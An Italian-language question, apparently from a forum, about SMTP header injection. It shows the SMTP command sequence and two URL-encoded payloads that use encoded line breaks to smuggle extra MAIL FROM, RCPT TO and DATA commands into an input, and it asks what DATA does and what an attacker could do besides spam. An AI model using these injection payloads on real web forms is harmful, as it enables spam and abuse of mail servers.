Ci sono alcune cose che non capisco riguardo all'iniezione.
L'iniezione è qualcosa lungo questa linea
> .
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
EMAIL data
.
Ecco due modi per iniettare inline:
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aS ubject:+test%0afoo%0a%2e%0a
o
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0 d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+% 0d%0aTo:+%0d%0aSubject:+test%0d%0 afoo%0d%0a%2e%0d%0a
Perché uso la parola chiave DATA, che cosa fa?
Supponiamo che l'iniezione abbia successo! cosa può fare un utente malintenzionato, a parte lo spam?